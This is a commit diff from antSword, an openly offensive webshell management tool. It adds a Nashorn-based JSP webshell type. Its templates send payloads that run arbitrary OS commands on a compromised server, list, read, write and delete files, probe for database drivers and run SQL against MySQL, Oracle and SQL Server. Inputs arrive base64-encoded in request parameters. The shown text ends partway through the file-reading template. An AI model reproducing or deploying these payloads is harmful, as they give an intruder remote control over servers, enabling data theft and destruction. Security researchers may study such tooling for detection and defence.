Skip to content

A
antSword
Commit a6efa86f authored by yzddmr6's avatar yzddmr6
Browse files
Options

新增基于js引擎的jsp一句话类型 

基于nashorn引擎,支持范围JDK>=8
parent ad8f443c
Expand all Hide whitespace changes
Inline Side-by-side
Showing with 2262 additions and 6 deletions
source/app.entry.js
View file @ a6efa86f
......@@ -174,6 +174,7 @@ antSword['encoders'] = (function () {
asp: [],
aspx: [],
jsp: [],
jsp_js: [],
php: [],
custom: []
};
......@@ -181,6 +182,7 @@ antSword['encoders'] = (function () {
asp: [],
aspx: [],
jsp: [],
jsp_js: [],
php: [],
custom: []
};
......@@ -189,7 +191,7 @@ antSword['encoders'] = (function () {
!fs.existsSync(userencoder_path) ?
fs.mkdirSync(userencoder_path) :
null;
['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
['asp', 'aspx', 'php', 'jsp', 'jsp_js','custom'].map((t) => {
!fs.existsSync(path.join(userencoder_path, `${t}`)) ?
fs.mkdirSync(path.join(userencoder_path, `${t}`)) :
null;
......@@ -230,6 +232,7 @@ antSword['decoders'] = (function () {
aspx: [],
php: [],
jsp: [],
jsp_js: [],
custom: []
};
var decoders_path = {
......@@ -237,6 +240,7 @@ antSword['decoders'] = (function () {
aspx: [],
php: [],
jsp: [],
jsp_js: [],
custom: []
};
let userdecoder_path = path.join(remote.process.env.AS_WORKDIR, 'antData/encoders');
......@@ -244,7 +248,7 @@ antSword['decoders'] = (function () {
!fs.existsSync(userdecoder_path) ?
fs.mkdirSync(userdecoder_path) :
null;
['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
['asp', 'aspx', 'php', 'jsp','jsp_js', 'custom'].map((t) => {
!fs.existsSync(path.join(userdecoder_path, `${t}`)) ?
fs.mkdirSync(path.join(userdecoder_path, `${t}`)) :
null;
......
source/core/index.js
View file @ a6efa86f
......@@ -14,7 +14,7 @@ class Core {
constructor() {
// 加载子模块列表
let cores = {};
['php', 'asp', 'aspx', 'jsp', 'custom', 'php4'].map((_) => {
['php', 'asp', 'aspx', 'jsp','jsp_js', 'custom', 'php4'].map((_) => {
cores[_] = require(`./${_}/index`);
});
// 返回子模块对象
......
source/core/jsp_js/decoder/default.js 0 → 100644
View file @ a6efa86f
/**
* php::default解码器
*/
'use strict';
module.exports = {
/**
* @returns {string} asenc 加密返回数据的函数
*/
asoutput: () => {
return `function asoutput(str){
return str;
}
`.replace(/\n\s+/g, '');
},
/**
* 解码 Buffer
* @param {Buffer} buff 要被解码的 Buffer
* @returns {Buffer} 解码后的 Buffer
*/
decode_buff: (buff) => {
return buff;
}
}
\ No newline at end of file
source/core/jsp_js/index.js 0 → 100644
View file @ a6efa86f
/**
* JSP_JS服务端脚本模板
* 开写:2021/04/06
* 更新:-
* 作者:yzddMr6 <https://github.com/yzddmr6>
*/
'use strict';
const Base = require('../base');
class JSP_JS extends Base {
constructor(opts) {
super(opts);
// 解析模板
[
'base',
'command',
'filemanager',
'database/sqlserver',
'database/mysql',
'database/oracle'
].map((_) => {
this.parseTemplate(`./jsp_js/template/${_}`);
});
// 解析编码器
this
.encoders
.map((_) => {
this.parseEncoder(`./jsp_js/encoder/${_}`);
});
this
.decoders
.map((_) => {
this.parseDecoder(`./jsp_js/decoder/${_}`);
});
}
/**
* 获取编码器列表
* ? 可以在antSword.core.php.prototype.encoders中获取此变量
* @return {array} 编码器列表
*/
get encoders() {
return [];
}
get decoders() {
return ["default"];
}
/**
* HTTP请求数据组合函数
* @param {Object} data 通过模板解析后的代码对象
* @param {bool} force_default 强制使用 default 解码
* @return {Promise} 返回一个Promise操作对象
*/
complete(data, force_default = false) {
// 分隔符号
let tag_s, tag_e;
if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tags']) {
tag_s = this.__opts__['otherConf']['custom-datatag-tags'];
} else {
tag_s = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "->|";
}
if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tage']) {
tag_e = this.__opts__['otherConf']['custom-datatag-tage'];
} else {
tag_e = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "|<-";
}
let jspencode = this.__opts__['encode'];
switch (this.__opts__['encode']) {
case "UTF8":
jspencode = "UTF-8";
break;
default:
break;
}
let asencCode;
let ext = {
opts: this.__opts__,
};
if (!force_default) {
asencCode = this.__decoder__[this.__opts__['decoder'] || 'default'].asoutput(ext);
} else {
asencCode = this.__decoder__['default'].asoutput(ext);
}
// 组合完整的代码
let tmpCode = data['_'];
data['_'] = `
try {
load("nashorn:mozilla_compat.js");
} catch (e) {}
importPackage(Packages.java.util);
importPackage(Packages.java.lang);
importPackage(Packages.java.io);
var output = new StringBuffer("");
var cs = "${jspencode}";
var tag_s = "${tag_s}";
var tag_e = "${tag_e}";
try {
response.setContentType("text/html");
request.setCharacterEncoding(cs);
response.setCharacterEncoding(cs);
function decode(str) {
str=str.substr(#randomPrefix#);
return byte2Str(Base64DecodeToByte(str));
}
function Base64DecodeToByte(str) {
importPackage(Packages.sun.misc);
importPackage(Packages.java.util);
var bt;
try {
bt = new BASE64Decoder().decodeBuffer(str);
} catch (e) {
bt = Base64.getDecoder().decode(str);
}
return bt;
}
function byte2Str(bt) {
var strType = Java.type("java.lang.String");
var result = new strType(bt, cs);
return result;
}
${asencCode}
${tmpCode}
} catch (e) {
output.append("ERROR:// " + e.toString());
}
try {
response.getWriter().print(tag_s + asoutput(output.toString()) + tag_e);
} catch (e) {}
`.replace(/\n\s+/g, '').replace(/#randomPrefix#/g, this.__opts__.otherConf["random-Prefix"]);
// 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data);
}
}
module.exports = JSP_JS;
\ No newline at end of file
source/core/jsp_js/template/base.js 0 → 100644
View file @ a6efa86f
/**
* 基础信息模板
* ? 获取系统信息、当前用户、当前路径、盘符列表
*/
module.exports = () => ({
info: {
_: `function SysInfoCode() {
var d = System.getProperty("user.dir");
var serverInfo = System.getProperty("os.name");
var user = System.getProperty("user.name");
var driverlist = WwwRootPathCode(d);
return d + "\t" + driverlist + "\t" + serverInfo + "\t" + user;
}
function WwwRootPathCode(d) {
var s = "";
if (!d.substring(0, 1).equals("/")) {
var roots = java.io.File.listRoots();
for (var i = 0; i < roots.length; i++) {
s += roots[i].toString().substring(0, 2) + "";
}
} else {
s += "/";
}
return s;
}
output.append(SysInfoCode());
`.replace(/\n\s+/g, '')
},
probedb: { // 检测数据库函数支持
_: `
function ProbedbCode() {
var drivers = [
"com.mysql.jdbc.Driver",
"com.mysql.cj.jdbc.Driver",
"oracle.jdbc.driver.OracleDriver",
"org.postgresql.Driver",
"weblogic.jdbc.mssqlserver4.Driver",
"com.microsoft.sqlserver.jdbc.SQLServerDriver",
"com.inet.pool.PoolDriver",
];
var ret = "";
for (var i = 0; i < drivers.length; i++) {
try {
Class.forName(drivers[i]);
ret += drivers[i] + "\\t1\\n";
} catch (e) {
ret += drivers[i] + "\\t0\\n";
}
}
return ret;
}
output.append(ProbedbCode());
`.replace(/\n\s+/g, '')
}
})
\ No newline at end of file
source/core/jsp_js/template/command.js 0 → 100644
View file @ a6efa86f
/**
* 虚拟终端命令执行
*/
module.exports = (arg1, arg2, arg3) => ({
exec: {
_: `
function ExecuteCommandCode(cmdPath, command, envstr) {
var sb = new StringBuffer();
var split = isWin() ? "/c" : "-c";
var s = [cmdPath, split, command];
var readonlyenv = System.getenv();
var cmdenv = new HashMap(readonlyenv);
var envs = envstr.split("\\\\|\\\\|\\\\|asline\\\\|\\\\|\\\\|");
for (var i = 0; i < envs.length; i++) {
var es = envs[i].split("\\\\|\\\\|\\\\|askey\\\\|\\\\|\\\\|");
if (es.length == 2) {
cmdenv.put(es[0], es[1]);
}
}
var e = [];
var i = 0;
for (var key in cmdenv) {
print(key + "=" + cmdenv[key]);
e[i] = key + "=" + cmdenv[key];
i++;
}
p = java.lang.Runtime.getRuntime().exec(s, e);
CopyInputStream(p.getInputStream(), sb);
CopyInputStream(p.getErrorStream(), sb);
return sb;
}
function CopyInputStream(is, sb) {
var l;
var br = new BufferedReader(new InputStreamReader(is, cs));
while ((l = br.readLine()) != null) {
sb.append(l + "\\r\\n");
}
br.close();
}
function isWin() {
var osname = System.getProperty("os.name");
osname = osname.toLowerCase();
return osname.startsWith("win");
}
var cmdPath = decode(request.getParameter("${arg1}"));
var command = decode(request.getParameter("${arg2}"));
var envstr = decode(request.getParameter("${arg3}"));
output.append(ExecuteCommandCode(cmdPath, command, envstr));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::bin}",
[arg2]: "#{newbase64::cmd}",
[arg3]: "#{newbase64::env}",
},
listcmd: {
_: `
function ListcmdCode(binarrstr) {
var binarr = binarrstr.split(",");
var ret = "";
for (var i = 0; i < binarr.length; i++) {
var f = new File(binarr[i]);
if (f.exists() && !f.isDirectory()) {
ret += binarr[i] + "\\t1\\n";
} else {
ret += binarr[i] + "\\t0\\n";
}
}
return ret;
}
var z1 = decode(request.getParameter("${arg1}"));
output.append(ListcmdCode(z1));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::binarr}",
},
});
source/core/jsp_js/template/database/mysql.js 0 → 100644
View file @ a6efa86f
//
// 默认代码模板
//
// @params
// :encode SHELL编码
// :conn 数据库连接字符串
// :sql 执行SQL语句
// :db 数据库名
// :table 表名
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
show_databases: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1] + "&characterEncoding=" + encode;
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showDatabases(encode, conn) {
var sql = "show databases";
var columnsep = "\\t";
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(showDatabases(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::encode}",
[arg2]: "#{newbase64::conn}",
},
show_tables: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1] + "&characterEncoding=" + encode;
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showTables(encode, conn, dbname) {
var sql = "show tables from " + dbname;
var columnsep = "\\t";
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(showTables(z1, z2, z3));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::encode}",
[arg2]: "#{newbase64::conn}",
[arg3]: "#{newbase64::db}",
},
show_columns: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1] + "&characterEncoding=" + encode;
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showColumns(encode, conn, dbname, table) {
var columnsep = "\\t";
var rowsep = "";
var sql = "select * from " + dbname + "." + table + " limit 0,0";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
var z4 = decode(request.getParameter("${arg4}"));
output.append(showColumns(z1, z2, z3, z4));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::encode}",
[arg2]: "#{newbase64::conn}",
[arg3]: "#{newbase64::db}",
[arg4]: "#{newbase64::table}",
},
query: {
_: `
function Base64Encode(str) {
importPackage(Packages.sun.misc);
importPackage(Packages.java.util);
var ret = "";
try {
ret = new Base64().getEncoder().encodeToString(str.getBytes());
} catch (e) {
ret = new BASE64Encoder().encode(str.getBytes());
}
ret = ret.replaceAll("\\r|\\n", "");
return ret;
}
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1] + "&characterEncoding=" + encode;
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var isRS = stmt.execute(sql);
if (isRS) {
var rs = stmt.getResultSet();
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += Base64Encode(columnValue) + columnsep;
}
ret += rowsep;
}
} else {
ret += "Result" + columnsep + rowsep;
var rowCount = stmt.getUpdateCount();
if (rowCount > 0) {
ret += Base64Encode("Rows changed = " + rowCount) + columnsep + rowsep;
} else if (rowCount == 0) {
ret +=
Base64Encode("No rows changed or statement was DDL command") +
columnsep +
rowsep;
} else {
ret += Base64Encode("False") + columnsep + rowsep;
}
}
return ret;
}
function query(encode, conn, sql) {
var columnsep = "\\t|\\t";
var rowsep = "\\r\\n";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(query(z1, z2, z3));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::encode}",
[arg2]: "#{newbase64::conn}",
[arg3]: "#{newbase64::sql}",
},
});
source/core/jsp_js/template/database/oracle.js 0 → 100644
View file @ a6efa86f
//
// oracle 模板
//
// @params
// :encode SHELL编码
// :conn 数据库连接字符串
// :sql 执行SQL语句
// :db 数据库名
// :table 表名
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
show_databases: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url, x[2], x[3]);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showDatabases(encode, conn) {
var sql = "SELECT USERNAME FROM ALL_USERS ORDER BY 1";
var columnsep = "\\t";
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(showDatabases(z1, z2));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}'
},
show_tables: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url, x[2], x[3]);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showTables(encode, conn, dbname) {
var sql =
"SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='" +
dbname +
"' ORDER BY 1)";
var columnsep = "\\t";
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(showTables(z1, z2, z3));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::db}'
},
show_columns: {
_: `function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url, x[2], x[3]);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showColumns(encode, conn, dbname, table) {
var columnsep = "\\t";
var rowsep = "";
var sql = "select * from " + dbname + "." + table + " WHERE ROWNUM=0";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
var z4 = decode(request.getParameter("${arg4}"));
output.append(showColumns(z1, z2, z3, z4));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::db}',
[arg4]: '#{newbase64::table}'
},
query: {
_: `
function Base64Encode(str) {
importPackage(Packages.sun.misc);
importPackage(Packages.java.util);
var ret = "";
try {
ret = new Base64().getEncoder().encodeToString(str.getBytes());
} catch (e) {
ret = new BASE64Encoder().encode(str.getBytes());
}
ret = ret.replaceAll("\\r|\\n", "");
return ret;
}
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url, x[2], x[3]);
var stmt = c.createStatement();
var isRS = stmt.execute(sql);
if (isRS) {
var rs = stmt.getResultSet();
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += Base64Encode(columnValue) + columnsep;
}
ret += rowsep;
}
} else {
ret += "Result" + columnsep + rowsep;
var rowCount = stmt.getUpdateCount();
if (rowCount > 0) {
ret += Base64Encode("Rows changed = " + rowCount) + columnsep + rowsep;
} else if (rowCount == 0) {
ret +=
Base64Encode("No rows changed or statement was DDL command") +
columnsep +
rowsep;
} else {
ret += Base64Encode("False") + columnsep + rowsep;
}
}
return ret;
}
function query(encode, conn, sql) {
var columnsep = "\\t|\\t";
var rowsep = "\\r\\n";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(query(z1, z2, z3));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::sql}'
}
})
\ No newline at end of file
source/core/jsp_js/template/database/sqlserver.js 0 → 100644
View file @ a6efa86f
//
// sqlserver 代码模板
//
// @params
// :encode SHELL编码
// :conn 数据库连接字符串
// :sql 执行SQL语句
// :db 数据库名
// :table 表名
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
show_databases: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showDatabases(encode, conn) {
var sql = "select [name] from master.dbo.sysdatabases order by 1";
var columnsep = "\\t";
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(showDatabases(z1, z2));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}'
},
show_tables: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showTables(encode, conn, dbname) {
var sql = "SELECT [name] FROM sysobjects WHERE xtype='U' ORDER BY 1";
var columnsep = "\\t";
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(showTables(z1, z2, z3));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::db}'
},
show_columns: {
_: `function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showColumns(encode, conn, dbname, table) {
var columnsep = "\\t";
var rowsep = "";
var sql = "SELECT TOP 1 * FROM " + dbname + "." + table;
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
var z4 = decode(request.getParameter("${arg4}"));
output.append(showColumns(z1, z2, z3, z4));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::db}',
[arg4]: '#{newbase64::table}'
},
query: {
_: `
function Base64Encode(str) {
importPackage(Packages.sun.misc);
importPackage(Packages.java.util);
var ret = "";
try {
ret = new Base64().getEncoder().encodeToString(str.getBytes());
} catch (e) {
ret = new BASE64Encoder().encode(str.getBytes());
}
ret = ret.replaceAll("\\r|\\n", "");
return ret;
}
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var isRS = stmt.execute(sql);
if (isRS) {
var rs = stmt.getResultSet();
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += Base64Encode(columnValue) + columnsep;
}
ret += rowsep;
}
} else {
ret += "Result" + columnsep + rowsep;
var rowCount = stmt.getUpdateCount();
if (rowCount > 0) {
ret += Base64Encode("Rows changed = " + rowCount) + columnsep + rowsep;
} else if (rowCount == 0) {
ret +=
Base64Encode("No rows changed or statement was DDL command") +
columnsep +
rowsep;
} else {
ret += Base64Encode("False") + columnsep + rowsep;
}
}
return ret;
}
function query(encode, conn, sql) {
var columnsep = "\\t|\\t";
var rowsep = "\\r\\n";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(query(z1, z2, z3));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::sql}'
}
})
\ No newline at end of file
source/core/jsp_js/template/filemanager.js 0 → 100644
View file @ a6efa86f
/**
* 文件管理模板
*/
module.exports = (arg1, arg2, arg3) => ({
dir: {
_: `
function FileTreeCode(dirPath) {
var oF = new File(dirPath);
var l = oF.listFiles();
var s = "", sT, sQ, sF = "";
var dt;
var fm = new java.text.SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
for (var i = 0; i < l.length; i++) {
dt = new java.util.Date(l[i].lastModified());
sT = fm.format(dt);
sQ = l[i].canRead() ? "R" : "-";
sQ += l[i].canWrite() ? "W" : "-";
try {
sQ += l[i].getClass().getMethod("canExecute").invoke(l[i]) ? "X" : "-";
}catch (e) {
sQ += "-";
}
var nm = l[i].getName();
if (l[i].isDirectory()) {
s += nm + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\\n";
} else {
sF += nm + "\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\\n";
}
}
s += sF;
return s;
}
var dirPath=decode(request.getParameter("${arg1}"));
output.append(FileTreeCode(dirPath));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
delete: {
_: `
function DeleteFileOrDirCode(fileOrDirPath) {
var f = new File(fileOrDirPath);
if (f.isDirectory()) {
var x = f.listFiles();
for (var k = 0; k < x.length; k++) {
if (!x[k].delete()) {
DeleteFileOrDirCode(x[k].getPath());
}
}
}
f.delete();
return "1";
}
var fileOrDirPath = decode(request.getParameter("${arg1}"));
output.append(DeleteFileOrDirCode(fileOrDirPath));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
create_file: {
_: `
function WriteFileCode(filePath, fileContext) {
var h = "0123456789ABCDEF";
var fileHexContext = strtohexstr(fileContext);
var f = new File(filePath);
var os = new FileOutputStream(f);
for (var i = 0; i < fileHexContext.length(); i += 2) {
os.write(
(h.indexOf(fileHexContext.charAt(i)) << 4) |
h.indexOf(fileHexContext.charAt(i + 1))
);
}
os.close();
return "1";
}
function strtohexstr(fileContext) {
var h = "0123456789ABCDEF";
var bytes = fileContext.getBytes(cs);
var sb = new StringBuilder(bytes.length * 2);
for (var i = 0; i < bytes.length; i++) {
sb.append(h.charAt((bytes[i] & 0xf0) >> 4));
sb.append(h.charAt((bytes[i] & 0x0f) >> 0));
}
return sb.toString();
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(WriteFileCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::content}",
},
read_file: {
_: `
function ReadFileCode(filePath) {
var l = "";
var s = "";
var br = new BufferedReader(
new InputStreamReader(new FileInputStream(new File(filePath)), cs)
);
while ((l = br.readLine()) != null) {
s += l + "\\r\\n";
}
br.close();
return s;
}
var z1 = decode(request.getParameter("${arg1}"));
output.append(ReadFileCode(z1));
`.replace(/\n\s+/g, ""),
